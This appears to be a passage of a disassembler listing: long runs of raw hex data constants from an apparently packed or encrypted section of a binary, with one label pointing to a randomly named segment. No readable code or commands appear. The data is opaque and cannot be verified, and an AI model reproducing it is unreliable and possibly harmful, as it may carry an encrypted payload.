		dd 9C928461h, 0BEA02769h, 0EA216670h, 0FF5CB1A9h, 0FFB5F83Dh
		dd 0F0785107h, 0A46E6DCCh, 147F1067h, 0A616C19Fh, 34A77B5Fh
		dd 6733BCDAh, 0A8E70639h, 0F05C035Eh, 643E0F51h, 1BCEEA4Dh
		dd 0C6832A1Ah, 4C8BD0BFh, 0A46363D2h, 8137FE74h, 0EAE01BA0h
		dd 5215F39h, 8AE8F87Fh,	1C09715Fh, 428D2E91h, 34684A5Eh
		dd 0AE30356h, 0D73D9FE3h, 3762C95Ah, 0A96FC492h, 0F516F345h
		dd 77766694h, 0D8608BBDh, 5DA8E820h, 1FCD72FFh,	0E30B4A54h
		dd 0D1F65E8Eh, 153B7580h, 62A54DBEh, 0B69AAC87h, 3501940Eh
		dd 0A2538BE2h, 9E19B6A9h, 5767B2DFh, 2297FC4h, 5610BAC7h
		dd 0C040AAC3h, 0F7993525h, 0DF7A88D5h, 4442243Fh, 49DD62C7h
		dd 78B7B4F6h, 0DF83DCE3h, 0E2E5CD27h, 6BA313AFh, 0EFE8E0C3h
		dd 0DE949CEAh, 111EB35Fh, 34F73466h, 0DE5E0F82h, 0E37155B8h
		dd 66CD28AAh, 0F8BECFEBh, 66A41DC0h, 0B275DF29h, 0F3AD1E78h
		dd 0B2DFD80Ch, 0CFAA7A73h, 9D061EDCh, 213B3815h, 9F62CE84h
		dd 0AAB4B2D8h, 0EDFADC37h, 0B67606B8h, 3699FB09h, 0A971353Dh
		dd 60E33AE2h, 3CD949FDh, 871EE4B5h, 9DB53FC3h, 7A854CAAh
		dd 4738B7C5h, 0D2AE9DC7h, 0A9AECDC6h, 0C43FADDh, 7F7887E0h
		dd 6C238F41h, 6C8D5AB4h, 0EBD7F3Dh, 0C202EF6Ch,	30A1F9CEh
		dd 0EE4BA545h, 0C73B818Ch, 0D9C60FC5h, 0EF0E81A0h, 512EBF1Ch
		dd 2EFE3794h, 368EF6C0h, 6DC1FA24h, 0B6D8EC7h, 0B0515F8Fh
		dd 72F19735h, 0A4B9B87Bh, 25BF59DFh, 60D563C0h,	90FCD6FEh
		dd 0B6B454E1h, 0E0DD34FEh, 0BFDBF9D6h, 897C4080h, 52B911CEh
		dd 0C170DD08h, 25AED2C4h, 4CFF8E20h, 0E3F20945h, 0B1317EE0h
		dd 0FCB67FB6h, 5AD38849h, 6D4AC25Dh, 93C1419Eh,	2878350Fh
		dd 0E9BFE529h, 38DBE567h, 0FC96D35Ch, 1BB47E90h, 5ED1E76Ah
		dd 0E6ADADDDh, 679899E9h, 0F45F6FCEh, 9F639F46h, 0C3EBFF26h
		dd 0C6CA2360h, 86C03B0Fh, 3CF8DDCFh, 0CCD71B8h,	123719F5h
		dd 954E4B45h, 0BEEA7102h, 0D70ED696h, 74A860A7h, 586C02A4h
		dd 0E0F87FADh, 0BA9C1F13h, 56B46AD6h, 0FA39E797h, 8D1550BBh
		dd 359E53B9h, 0B473933Ah, 78A62124h, 0D5C97F8Bh, 0D46D92E4h
		dd 34C3B6B9h, 446C13BBh, 3F71B6B8h, 0FF97A1Ch, 97F87E4Ch
		dd 75F931B5h, 5F89CCF2h, 0EA1E024h, 0FC94E6A5h,	8FEDD72Ch
		dd 0A8AC5E7Ah, 50B0D6B4h, 9B296494h, 0B08B2A02h, 0AF183F51h
		dd 0A8B0D707h, 0E97E5640h, 792A8A83h, 71218D2Bh, 0C394AFA2h
		dd 504A46FAh, 6C90E547h, 2707B0D0h, 0DA30BC5Ch,	0C600E183h
		dd 0D3769DCCh, 39CB1B78h, 7ADC9F24h, 0FF1F3965h, 0EA2DD7F6h
		dd 0CC06F2FFh
		db 97h,	0C7h, 0FBh
byte_470C83	db 0D1h			; DATA XREF: hvvrg7ie:loc_4528F9o
		dd 0F4DD1B24h, 545EDEC2h, 0EBB90603h, 7160C5A3h, 0B95CA239h
		dd 7303A338h, 6C8A8CEEh, 0AFF5E7D2h, 0E4E07CCDh, 515CBDC1h
		dd 0C58DC361h, 0F10959A2h, 0C007778Eh, 0BE9D6A6Bh, 289BB68Fh
		dd 27737A41h, 0C6E78688h, 2303446Ch, 0AD1C0F4Dh, 0A4AF5E51h
		dd 48BFA5E1h, 0EFBBB9Dh, 6F0DDF86h, 63DCE008h, 0A34A794Eh
		dd 86A9755Eh, 0B32B17EBh, 46F99880h, 6FBDC208h,	4A37FE31h
		dd 5FDE7782h, 0B26E9D02h, 1F8CB5D6h, 8CA2C7F2h,	0D166E52Eh
		dd 0E08F81E4h, 0D9945B03h, 783C58CCh, 0A94FBF25h, 0DFD6070Dh
		dd 0CBBBBCFAh, 607C2E5Ah, 0D8DAFD5Ah, 5AA07B46h, 6D408E6Dh
		dd 8646FDFAh, 857F12D0h, 0BEC32E17h, 0BBDDAEEDh, 97BC03C7h
		dd 8F58AB94h, 77819A83h, 1E9994C3h, 0A05E615Dh,	0D31F5401h
		dd 9DC4073Bh, 8312CECEh, 0F03DAEF4h, 27E5CAC9h,	0D94F68CCh
		dd 83633302h, 7BB34D43h, 0ADB039E7h, 4B78AAD6h,	445FBA3Dh
		dd 0F9C234AAh, 0B1986A02h, 67D2655Dh, 0DE341A6Bh, 0F0D925EBh
		dd 0FDFAB102h, 0D6207F45h, 0BA5D78FDh, 0BEDC3C9Fh, 0C4F86340h
		dd 0BDE23D51h, 680502D6h, 42FF4895h, 0BFD869DCh, 754C76A1h
		dd 3C9DDC08h, 6D2BDAB1h, 7E5A170Dh, 1E6D55E4h, 2CC80C53h
		dd 0AAEA2BDh, 166F5595h, 80482D74h, 756A5A27h, 0EACF555Bh
		dd 90302FC2h, 0B053A1F1h, 0A2742905h, 6C5E4BFAh, 64A1CE24h
		dd 48E67AFBh, 30951051h, 73566BEDh, 0F13160CBh,	0C2A88AC7h
		dd 6B5A377Ah, 266261F1h, 24CE475Dh, 6CABB925h, 0A025C2E6h
		dd 0FDA9C208h, 5886F752h, 0B1B09965h, 679BB15Eh, 0EC405EA1h
		dd 2B87C754h, 6ABFE9DCh, 0A2CD54F2h, 0BF988207h, 0FBAE4AF8h
		dd 0C0440718h, 482D3622h, 51AE4154h, 0BFC541D5h, 512D62F0h
		dd 7E692E5h, 74AD22DDh,	668FD4FAh, 0B10A103Ah, 2A0810B7h
		dd 3BBED8C8h, 4C2E43A8h, 2B82D018h, 0A0887489h,	2B49565h
		dd 0EDBFA2BFh, 17DD07BCh, 305F3C0Bh, 897D55F1h,	12D4039Dh
		dd 0F80BB127h, 0D51167E1h, 0AA8A27ADh, 0EA33EE26h, 0D68C904Eh
		dd 0A5AF6B77h, 591DED9Eh, 6CB0ADB8h, 6C8403E1h,	0EC971CB1h
		dd 20C5B6EEh, 0E4516D1Ah, 4D5F3600h, 63B49FBh, 5058A18Fh
		dd 3DDB13FBh, 99F5FC6Ch, 328F9883h, 6857987Dh, 311EA033h
		dd 0DB464DAh, 916218CEh, 0E9068AE9h, 68FED794h,	0D95A46A3h
		dd 8A9FEDC8h, 0E5FCEC3Dh, 0AFBBEC25h, 0BDF39FAh, 0AAA1B684h
		dd 73C15192h, 0E7BEFB76h, 75FBB355h, 54285E26h,	0BD3675BBh
		dd 0B20F7E33h, 26E9592Dh, 818ED837h, 0FC199ABh,	42DF23E5h
		dd 0E3BC4965h, 8F2C5875h, 7EC525D1h, 0A0CAA85Ah, 0C912A9A7h
		dd 3D1094D7h, 6E63918Dh, 0AC1C70DAh, 2F6EA75Bh,	0ADF98AD3h
		dd 44ED9B85h, 0D71809B9h, 0A29F4E17h, 3F1F3BE6h, 0CC30BD2Ch
		dd 970F947Ch, 5AF23EEDh, 0CF5D77F3h, 8C8D873Ch,	146BE23Bh
		dd 3CF312F5h, 8497B27Fh, 500DE282h, 8A503707h, 0F154175Bh
		dd 34C55AE1h, 5CF1C426h, 0CBC511EAh, 235D5D14h,	0DFC9A3F5h
		dd 90598F93h, 942D5076h, 4B693CDBh, 0A60319C8h,	0B03D3645h
		dd 55A09198h, 0F017F4A7h, 9E7F1099h, 4333DB41h,	0B32AB963h
		dd 63E2A739h, 0DA3AF393h, 1835AEE2h, 0BE48D6E8h, 539B3892h
		dd 0BA09B16Fh, 0E1E6766h, 26273F59h, 57AAFABEh,	79FD7787h
		dd 0E895D7DDh, 49971D83h, 3A0259AFh, 40590697h,	2BA6D534h
		dd 0AAFCABDAh, 0F455EC39h, 9E670E7Bh, 12C7C236h, 0CF38AA78h
		dd 33F37216h, 0BF7286FEh, 0EAA83E92h, 4B44A00Ah, 0D40DA894h
		dd 617F3226h, 8C82D3DFh, 6127403Bh, 0F1A7AD8Dh,	7BE0DBB7h
		dd 0ECA98971h, 0B90E79C0h, 0D2BB1CDAh, 9BBC15FEh, 34531EBAh
		dd 79518750h, 2DF219DBh, 0D6ED4B8Fh, 6B696A4h, 327B1D6Ch
		dd 67A0F605h, 57F6FAC0h, 61E6C988h, 0A861585Fh,	0C93E85C9h
		dd 0E444DC7Fh, 0BF66118Ch, 7228A24h, 0C2A7B281h, 661CF409h
		dd 9D8DF1EAh, 65F6186Fh, 519FD490h, 0E36BE842h,	0B0D1680Ah
		dd 0F16E2945h, 50FC79D3h, 0B4F970FDh, 8D1E46FEh, 26BE9396h
		dd 3F03AD4Dh, 3FF5D5F0h, 14AF9398h, 0A8DDD399h,	0A2C836D3h
		dd 0FBE7D977h, 7AE7D252h, 5ADF85h, 0C1E3FAA8h, 3EFF4ABDh
		dd 0B0EC670h, 0F1FCDD93h, 0C17787E0h, 206DD13Bh, 0AA363170h
		dd 7AE6ECD0h, 0A2ADAF88h, 0E07E32AAh, 350A94A5h, 45F6509Eh
		dd 3D032CD3h, 0D4823153h, 0B4272EEAh, 72BFE28h,	5FE0FCDDh
		dd 96B4C755h, 722DC285h, 5540A8E0h, 7CE2DD8Ah, 2A3B120Ch
		dd 0A9DC1424h, 77DD09BFh, 16A05BBAh, 1BE9B941h,	7598DBADh
		dd 0F62E0173h, 3C0F1C35h, 10984251h, 9A252789h,	0F579F06h
		dd 0D2718CE7h, 802739AAh, 2C0E71B5h, 0CBE7D311h, 828DF7DEh
		dd 70430BEh, 53D11EECh,	56361702h, 0E81C87E9h, 362ED0C7h
		dd 0FD4EAE83h, 0AD2AE2B4h, 0DE7CBE80h, 0A4D68E21h, 0E5FDF34Fh
		dd 0B8D2D1FCh, 793AB3ABh, 2A577CBCh, 61AEA1Ah, 0EED01E62h
		dd 0EFEB6DDDh, 40915FEDh, 0ED335BE1h, 4E7BD7DCh, 0B45C5897h
		dd 3B2B07BBh, 3E89E27Dh, 40B0DF25h, 55E39655h, 988A1C3Fh
		dd 0FC357C5Ch, 0EA96EDEDh, 9B73FC7Dh, 0F09621A1h, 5E4F4AC4h
		dd 89552EE5h, 0F1471E2Fh, 0C497B6E0h, 1670FA3Dh, 0D16C3E78h
		dd 11197AE8h, 8833F35Dh, 76FF0231h, 464050A6h, 0D056C1F7h
		dd 9A5B87ABh, 3D535B2Ch, 0A10BF3A8h, 0AB356580h, 0B0E86D43h
		dd 86AB8960h, 0F2A08159h, 7BF15A33h, 49CB306Bh,	5ABDA7EFh
		dd 0D6DDFBA2h, 0DB3975EDh, 81B945C6h, 1DF7B278h, 56B28Ch
		dd 0C2AE8FAh, 3A24D46Ch, 5D1AA2BEh, 0DC57A1F6h,	9DAC498Ch
		dd 0F40E4884h, 5CA77B76h, 0E91BB1F3h, 0C1F011B7h, 9A2F97DAh
		dd 2EC52318h, 0C70BB2D1h, 0FE6C6197h, 0B70A51BCh, 64FE0177h
		dd 0CECA87E3h, 8F760020h, 0F44EFB16h, 86AF7D54h, 2AFBCF5Fh
		dd 0CFBF8D26h, 3339CF02h, 0FC655AA4h, 18DDBE89h, 0BF894D71h
		dd 0DDC1FEE1h, 8266AC8Fh, 27E8F6C0h, 0B877076Ch, 0A18623A5h
		dd 7EFCC8AEh, 2653767Ch, 0FD13CBB9h, 82D67DD1h,	78D5E13h
		dd 0FEDE6847h, 0CD840635h, 496B4A48h, 0EA4326FFh, 0F62F3261h
		dd 4DF0174Dh, 0E6D52152h, 69CDD3DBh, 577C2AADh,	0D81F5BD9h
		dd 0CF03A1BAh, 7CB0AEAEh, 0FE76DDF0h, 388D4039h, 0D9DDF16Bh
		dd 4F7C9891h, 8FBFA301h, 13138248h, 0C5DA0BD5h,	70F9B325h
		dd 0C0E40F5Eh, 3D6899Ch, 0A86CA0CEh, 28968318h,	0E08999EFh
		dd 0E0EB2783h, 0D4AA4EFBh, 0D90E47A9h, 0F1F7CA04h, 2CF282Ch
		dd 630EDC1Eh, 9BF08783h, 6EEED2D8h, 0F3BFF954h,	8F13A071h
		dd 9FF6C1F1h, 8366D509h, 0AD2D103h, 17222E4Ah, 0FF64EEB4h
		dd 0B6250C95h, 0D2AA5F78h, 69A66E9Eh, 244E0BD3h, 0DBE3A88Eh
		dd 56EC808Dh, 1AB9A818h, 0F7FA005Fh, 423C00AEh,	7D6ED026h
		dd 93A8E6AAh, 0FCB94A91h, 34EB3E5Fh, 118848E2h,	0BCF819Ch
		dd 0BE0BCC7Fh, 55A10183h, 2A77D4C1h, 0DD90D385h, 0A3FC2959h
		dd 77533096h, 0F95B1DBAh, 62D2EE2Dh, 15683AA1h,	0DCDACA41h
		dd 0DE29EC50h, 82396405h, 0DD25655Bh, 73BEE802h, 0BE14E405h
		dd 0C6BA7E1Bh, 50F975A6h, 69BEC0BDh, 953DAEC7h,	0ACBC8B83h
		dd 0F1E5D664h, 87EA1165h, 0DFD1C156h, 0BD0503D8h, 7614B242h
		dd 56A86356h, 0C0E6A63Ch, 535F6A5Ch, 74002ADh, 636D33EEh
		dd 2AA64289h, 0EFAFB68Eh, 60FF3B17h, 75FC824h, 8F032F20h
		dd 0F428EAE4h, 6D32EB93h, 3B39C11Dh, 72B4A2F1h,	1C3F81F5h
		dd 9487F2F8h, 454511B3h, 0AC7AC1FEh, 17B56CB6h,	12988757h
		dd 0AC3C0FADh, 5E4BC0D8h
		dd 612241F7h, 9AFE3D79h, 10961B2Bh, 81EB5522h, 0DFEBC71Bh
		dd 6F94767h, 0DDC162Eh,	8D026BDCh, 2D9A0513h, 0D3BFABDAh
		dd 517FF7B3h, 0CAB4E8C5h, 587475BAh, 0B3EDD5B2h, 0FE33F09Ch
		dd 12022FE5h, 6AE50F9Dh, 2A00ED21h, 9FABF8BDh, 90E8DB12h
		dd 27898199h, 17B9A273h, 0D133DFECh, 17D1B9D2h,	4261A1D1h
		dd 0B8F0D8F4h, 0E7399089h, 1F15FD35h, 859D5219h, 8B2A6053h
		dd 6270B4D7h, 1E6EB5ABh, 0DB220BB8h, 0C2B5A588h, 422F4EB8h
		dd 5D013DFBh, 0B112D34Bh, 895FC0F1h, 24555984h,	75EC1B4Eh
		dd 0AE73A71Ah, 53E57875h, 0C5610722h, 0E064EDC4h, 82F28AADh
		dd 0A3B5AA36h, 272FCD22h, 0D1771D75h, 1DD0754Eh, 0CB37E26Eh
		dd 0A7DDA8E1h, 670F9D5Ah, 59637FAAh, 0F87B2D64h, 0C63F52E7h
		dd 73BD88C4h, 6C336070h, 2BA992E3h, 36C7BC1Fh, 4EF8217Eh
		dd 9B53CA6Dh, 0CEAB3E2h, 6A6E76A0h, 0AA991414h,	0DD0DC9C0h
		dd 1F928902h, 0B459CD5Fh, 0BE58AB54h, 303C659Dh, 2EC7D0C5h
		dd 0F9E79F56h, 7831092Fh, 0B5DAC36Eh, 0DC13D2F1h, 0D8954D75h
		dd 0FA901131h, 19B5CF4Ch, 381A842Bh, 10BE6F6Ah,	73543F5Ah
		dd 0CC1B6A8Eh, 322C1D5Fh, 19D5BC0Bh, 8B66FBEFh,	7290AB22h
		dd 192D8F31h, 267861DFh, 33DE26C2h, 0AA8D1463h,	8A740F24h
		dd 0E4A6436Bh, 1AE419D7h, 50B499F2h, 9FBD9B64h,	0E24B4D33h
		dd 0E2608844h, 0CBB6F0F8h, 0ED61BF63h, 0F6F3CCEDh, 1F7E3EAAh
		dd 835B476Dh, 1E5E9BE9h, 94186EF8h, 0AB44478Fh,	0F0E1EF69h
		dd 25B34AAFh, 0B5173BD2h, 0E733D58Ch, 185EE079h, 7B183A60h
		dd 0A559FEF8h, 72D160F2h, 0F8B2DABEh, 7E40D18Ah, 4E696FA8h
		dd 5DA0D09Bh, 0E04CB860h, 7FA8DE5Eh, 1350A671h,	0D82A5B3Bh
		dd 57B341A3h, 0BBDFBACCh, 5B36F205h, 0A58C23BBh, 0D3847BC1h
		dd 0F5D3AC11h, 0E2C26B4Dh, 6E0BA38Ah, 13833763h, 61F95E87h
		dd 471BC585h, 0C63A750Bh, 6B528703h, 96D7CB36h,	86A5D025h
		dd 0A6B84EFEh, 84A622FCh, 0E02AC182h, 9A39B394h, 0BF8246D4h
		dd 0E328D0ECh, 0B6E435C1h, 781B9414h, 75F4F118h, 0D9C5B843h
		dd 0AD8F59C5h, 14AA3E1Ch, 9730D5F6h, 6B3D1696h,	1FCBDB44h
		dd 0B1B898E6h, 58B7EC51h, 0A265F7F0h, 592167C8h, 0B3916080h
		dd 0CCE7B020h, 0A09B1BDCh, 70D484FFh, 877B739Dh, 60838037h
		dd 2B8BFE67h, 0CDFEA863h, 0E0DD52F4h, 17C4FC16h, 8CEAE453h
		dd 9B9B1325h, 9532DC8Bh, 8609EDA3h, 83C0FE05h, 1D2A2D23h
		dd 9D33637h, 0A4F84C0Ah, 182DF03Bh, 0D8F51335h,	0E868A321h
		dd 9D5CEADFh, 0F6A89494h, 3843F6DEh, 9F2E4098h,	5574AA6Ch
		dd 6597C50Bh, 7DAA6F0Ah, 97B784C3h, 8C44FC11h, 15D5589Ah
		dd 2064C056h, 6FA5DCAFh, 15911556h, 0EC2990E0h,	697B48FBh
		dd 53AD512Fh, 0D8F2E4C0h, 0D2EDDF44h, 5762B25Bh, 0F2DB51F6h
		dd 2B722C02h, 6C02F4A0h, 0E82EF917h, 0CF819F43h, 631CD9A4h
		dd 5573A3F8h, 0AC641E4Bh, 445A1310h, 0E8409F4Fh, 0CDD3AA5h
		dd 3656574Ah, 5B4A7853h, 35D9C4Ah, 0F2540F76h, 0ABC594E4h
		dd 4D88EA2Ch, 3E6864E3h, 0E479D6B0h, 2EA30EECh,	0D6F14712h
		dd 0FDDED15Ch, 3B1AF945h, 0C4ED3A6Dh, 59D0A3E9h, 0D944F2F8h
		dd 0EDB4C1A2h, 0B0B8EA3Fh, 67CE68BCh, 0FECACA90h, 0EDF429B0h
		dd 7C1CCBF8h, 97456D5Bh, 0A1DB3D1Eh, 8793CF57h,	0A4B2538Ch
		dd 9879C136h, 1F49295Bh, 0F7583B7Ch, 8CDCCB97h,	671DE361h
		dd 2ACC5440h, 0EFD25FCEh, 982512h, 3F09F1ACh, 0B74B2AD4h
		dd 557C91C3h, 0D91E4E24h, 0D7585FEDh, 0F001EC4Eh, 0E08BA8B3h
		dd 576E5383h, 5BA82CA5h, 1BC2C2B3h, 2E902960h, 0DAA9C437h
		dd 0CF13B66Bh, 47AF38A1h, 0FFA6C688h, 0A6A5C3C0h, 3316B28Ch
		dd 5F3F2E8Fh, 0C4E7FF55h, 0DE6DBBA8h, 0E6416BBCh, 76C04F8Bh
		dd 43F7A7D9h, 35EF9699h, 81773F87h, 970D95A2h, 0CDC1B67Dh
		dd 6FBD8DCDh, 376973DCh, 0DC26D0B4h, 0E0FB5AB7h, 6E225D12h
		dd 0AE95778Fh, 0FE7459DAh, 7DD56D6Ch, 0FBE71120h, 473AC3ABh
		dd 93FACB8Eh, 23058396h, 8BFDC352h, 4E85DB55h, 3B59B4D9h
		dd 0B441F80Ch, 0FB19DF86h, 0C9962715h, 1AFC5759h, 243E4F37h
		dd 0C375C69Fh, 0AFD13F5Fh, 4F1E180Ch, 90280B45h, 7A5A9B0h
		dd 0FC2EBEBh, 0D079AF15h, 9A86F5DFh, 0C7E13653h, 6EFC72D1h
		dd 0E257FE2Dh, 197B892Ch, 1AD73017h, 0F364EC77h, 0CE18F77Bh
		dd 0FC6EBCDDh, 0EFC5656h, 27E60D24h, 9D09AF0Bh,	37ECD152h
		dd 0AAEEB7FAh, 17CFC3CBh, 0EE7E58Bh, 5F65EE6Ch,	2C18652Eh
		dd 6EE5F22Eh, 0DA331E87h, 84F115CAh, 0A17ED879h, 5AD9DC6Dh
		dd 0FB5FB75Eh, 0AC8C684Bh, 7C95149Ah, 309A9719h, 54AD27BBh
		dd 0F50DAF71h, 90013892h, 6A9E1B33h, 87555BBBh,	23891AB5h
		dd 0BE0A8B6Ch, 16486A40h, 8D46579Dh, 43D85BF1h,	727389BFh
		dd 56B1E06h, 42D22D56h,	0F15D46DEh, 3CFE29FDh, 1FEFF025h
		dd 8012ECA4h, 5F75C223h, 0C4F92FF4h, 0E4E38994h, 2044404Bh
		dd 7C753A0Bh, 0F4AE6FA5h, 8B85E7BBh, 4B8D18D7h,	938EA0C4h
		dd 0C5B47E5Dh, 0C74A0498h, 2FEABFC8h, 69B9ABD7h, 0ACE0B4C6h
		dd 2EC510C9h, 19512ACh,	0C5D6745h, 7D34C615h, 36CD85F5h
		dd 0BC430BA2h, 34337912h, 0A8489768h, 3BA18BB6h, 57DF4656h
		dd 75826F15h, 0DFD363D6h, 0B8229413h, 266BF896h, 0EF605A34h
		dd 7CB190F6h, 2D6A8642h, 0DE1AE35Eh, 0DDC4CA81h, 23B99ACDh
		dd 6EE562F8h, 6984B192h, 949DEEB2h, 7A3B138h, 48543A16h
		dd 4FE109CEh, 9DC0074Dh, 84FF487h, 0C2D239FCh, 46EFF74Ah
		dd 6922A502h, 0E80A7AB6h, 0A96D52F9h, 0FC0DDC3Eh, 522AE350h
		dd 53928D7Eh, 7B3FA13Bh, 805F3877h, 963E013Dh, 6AF2B96Fh
		dd 7F337F0h, 6DAA06D2h,	6CEE06D0h, 5CB35D12h, 4443A57Eh
		dd 0ADAF7A2Bh, 32E1EF59h, 12084FDFh, 0E6E7E5D9h, 81670BD8h
		dd 0BC596517h, 1AAB8DF7h, 223F18E7h, 603C337Eh,	62FAD7FDh
		dd 0BCCFEA4Ah, 0B7C0781Eh, 8E5FC59Bh, 0A05FB56h, 0A85E7F9Bh
		dd 6DE7182Ah, 8CA86EBBh, 0A21291D5h, 0CE9513E0h, 15C9DEF3h
		dd 0CA7192C7h, 0FF47477h, 0D15D77AFh, 2096F132h, 78DC9ADh
		dd 0EB28C8CEh, 66903B85h, 0ADA12AB8h, 0A94F9BBh, 0A7B5D62Ch
		dd 0E23A0965h, 19A69EEh, 2AF2E73Dh, 516D54AAh, 0D5AEED5Eh
		dd 0ABDB29B6h, 9F65358h, 0F463460Ah, 511CA797h,	4F76AE30h
		dd 918DE44Ch, 952CB280h, 0F11523EEh, 2DF03456h,	0EFC4AFFEh
		dd 617C6DB4h, 0E49A57FBh, 0B945AAABh, 0E6426027h, 431BA247h
		dd 0A26C097Dh, 0EFC75577h, 214A5703h, 0DFD7B9FDh, 0C17E205Fh
		dd 0E074F16Ch, 0C663EC1Fh, 4D572905h, 79DD56E7h, 0F0762B0h
		dd 0A16B3EACh, 0F1288935h, 0E29C4536h, 52554897h, 0D2BD229h
		dd 87749FAFh, 13317162h, 7741A1FCh, 0F104BC0Fh,	0FB52B6C6h
		dd 3B94B7EDh, 0A2A798F8h, 50FCCDA4h, 60AF6EB2h,	8DA846AFh
		dd 3CEB3D50h, 0DA1F285Ah, 0DE1EA926h, 0C3176604h, 0A8DFC3F2h
		dd 0FEFAE797h, 0BAD9AAA5h, 0D7F8AE4Fh, 0F1DF03E3h, 0FB983C08h
		dd 0D34B875Eh, 4146A538h, 0C5DA2B62h, 0ED962ABDh, 3491B42h
		dd 5F63DD7Ah, 0FEC194D8h, 0C5FF7CE8h, 0AA0299C3h, 6EC8AD1Eh
		dd 29D28B0Ch, 822A189Eh, 85F72981h, 8B75CB2Dh, 0FC3101AEh
		dd 40B089A2h, 0CFD6601Bh, 0A2B81F75h, 49DA040Fh, 0FCF3FCD4h
		dd 0E65F30B6h, 7D62B68Bh, 0F2B20567h, 0CF5476C0h, 0FF43BB9Eh
		dd 712BFE8h, 86AD6DA6h,	0EDB05853h, 0DB6A73ECh,	783CBF3Bh
		dd 1240D275h, 6C8A6870h
		dd 0B3137F99h, 0A6E9925h, 3B0E85A0h, 0BF8B0DFFh, 0FFDFBC0Ah
		dd 13E02231h, 0EDCB2DB5h, 25FA3DBBh, 7635EA19h,	0DE4D0BFh
		dd 0A5421631h, 5DCBAB16h, 0C942D18Ch, 0DEA676D2h, 0EE3694F6h
		dd 0D35706DFh, 95405247h, 0E4B81AD3h, 0B5D755EBh, 6C7FF5FFh
		dd 0DF35E26h, 0D662691Bh, 0D8F0998Ah, 2543DDB8h, 7451A990h
		dd 24471CCAh, 0DF793E7Ch, 4E169E88h, 725474CCh,	0D1CB6CD5h
		dd 0CF1FE9EEh, 6FC18707h, 67D6021Ch, 94EF5EC9h,	5CE6C23Ch
		dd 0C6E576C9h, 1DFEAE9Bh, 67BD2F9Eh, 0BA3F900Bh, 6AEE4E1Ah
		dd 882418B8h, 37D14F50h, 0FF2D44D5h, 4DD4B082h,	0F9CFEBA4h
		dd 0F879AD46h, 17B10DCFh, 7048200h, 0FDC59D4Bh,	74F8BE3Bh
		dd 1736DBC1h, 0C7DB3FCFh, 54DBC90Fh, 2FD0606Dh,	0DDC2B886h
		dd 7E104605h, 0E98802CDh, 0AC201338h, 9A8114DAh, 4DC1D3D0h
		dd 542A4D62h, 43F6E744h, 0C80D9CAEh, 2BE322AAh,	545A0A82h
		dd 196EC351h, 71942AB4h, 0F8C9D953h, 644A2D21h,	0C59E9595h
		dd 673F74E6h, 0AD1D7DCDh, 0F224C476h, 17F846DDh, 37729E74h
		dd 0B1B5A12Ch, 3F65288Bh, 52DDDEA7h, 7930EB8h, 14D5080Eh
		dd 0FA09EFC7h, 9A743F0h, 335F508Eh, 0E5F3D388h,	0E2CDEB5Eh
		dd 74E9C0AAh, 6CEED161h, 457ED021h, 0C6A8D81Eh,	7A3615D5h
		dd 0ACA6EE6Ch, 7AAB4902h, 0BF91D32Bh, 0B6E5D88Ch, 0E53989FEh
		dd 26E580B7h, 38B00299h, 0AF756DFAh, 2228EA76h,	98CE0E0Fh
		dd 7B9BA439h, 64C650C4h, 89F4FD55h, 36F32934h, 4E095485h
		dd 0CA0782BAh, 54C67812h, 50172F07h, 0C344FDCDh, 684E9B1Bh
		dd 4BACE1AAh, 4374153Dh, 7C2D284Bh, 17CD897Eh, 3F68A06Bh
		dd 0DC3F86F8h, 0ED0358C8h, 82020360h, 2ADDA2A0h, 94D80C42h
		dd 770C2452h, 0EE366D0Dh, 566CAFCCh, 90D4BB61h,	3EADA70Ch
		dd 0A80247B0h, 70CD149Ch, 7F3378BEh, 6FA3C4E8h,	98CEB988h
		dd 0D5DAD322h, 8BF57086h, 9E358D21h, 0E22D5F6h,	62E7AC4Fh
		dd 88669A19h, 0AD68D9C3h, 0B7DF4586h, 0FE8EA444h, 34DB1139h
		dd 0A95E82E9h, 2BA09993h, 0A099DAAAh, 35ED2677h, 0F1E40811h
		dd 7BA14CD9h, 0CE80363Ah, 525C674h, 1757AFCFh, 93E6E102h
		dd 0EC659BCAh, 13D86332h, 18528E36h, 48CCFA83h,	3ED64960h
		dd 0A2F1AFD2h, 45652652h, 0EAE127C7h, 1C6C48DFh, 52B46739h
		dd 0BCD8826Dh, 0D4F9407Ch, 58097016h, 25D04A6Ch, 5685136Bh
		dd 3B320563h, 27E1BA90h, 0D335FF5Ah, 4940DF0Fh,	83E1D29Eh
		dd 0E8B89141h, 4DB32E51h, 0F773B42Ah, 2236AAA2h, 0C375B02Bh
		dd 55CE6A1Bh, 60A5C7CCh, 0E2273371h, 42CC4763h,	4BB8535Ah
		dd 0D17F291Eh, 0E1BD18ABh, 0F0737C1Fh, 0C2D6D643h, 56AF942h
		dd 0CA5A1301h, 0F50BB6E9h, 6D35312Ch, 0DCC64616h, 1898E03Bh
		dd 0F106EA6Fh, 10387DF8h, 3336C8C3h, 6A647E2Bh,	88587D3Ah
		dd 0BE78FE05h, 0DAE58F3Dh, 0D4CA7E08h, 3C0F7168h, 11F468F3h
		dd 0B9FA1FA3h, 0C2ACD63Fh, 0ACCD7DE6h, 0EB0AD960h, 0A54C2070h
		dd 64B6AB3Ah, 0FF78AF69h, 4A67FEF8h, 0B8A51F6Ch, 94BB05A8h
		dd 47F634A5h, 41686E2Fh, 696035ABh, 0B34353C0h,	7FB8952Dh
		dd 0E7A83A18h, 0B567657h, 0F90A47h, 0AB64494Dh,	5F17DAD1h
		dd 0AA130FAEh, 0EC041207h, 2BC15791h, 2D9D0512h, 0D9847C48h
		dd 16600962h, 0A5733009h, 58F23358h, 425142C1h,	3F1F9AF4h
		dd 8CF2824h, 65CD91A9h,	933FDF79h, 0EC847E8Bh, 12C3B7F0h
		dd 0AF8A16AFh, 1825F4F0h, 0A914B64Eh, 0FA7C125Eh, 0F6E34AE2h
		dd 0B9EF5DDAh, 484A8199h, 63972D16h, 8F9CA54Ah,	9EE25AA8h
		dd 3AF307FCh, 0BF8137EEh, 0A0FDE45Fh, 7FDCECD6h, 144FEDE9h
		dd 5F12E46Ah, 0ADED4B27h, 0CB6AD743h, 1F99617Dh, 0E31FC233h
		dd 0F5621592h, 0EFDC6576h, 9E8152F8h, 1B82CA68h, 8982DD26h
		dd 2F385A13h, 0BECFF51Ch, 759560ECh, 0C895A555h, 0AB9A1ACFh
		dd 31BFF0F0h, 35B9D76Ah, 961A7DBh, 3F969769h, 89C7C85Fh
		dd 0E78FA376h, 61F1A721h, 0B94FEF9Dh, 4B45ED46h, 934C5E92h
		dd 9D4C04C6h, 0E4AAAB7Ah, 7F4F1F7Eh, 4384B5FEh,	378DDD5Fh
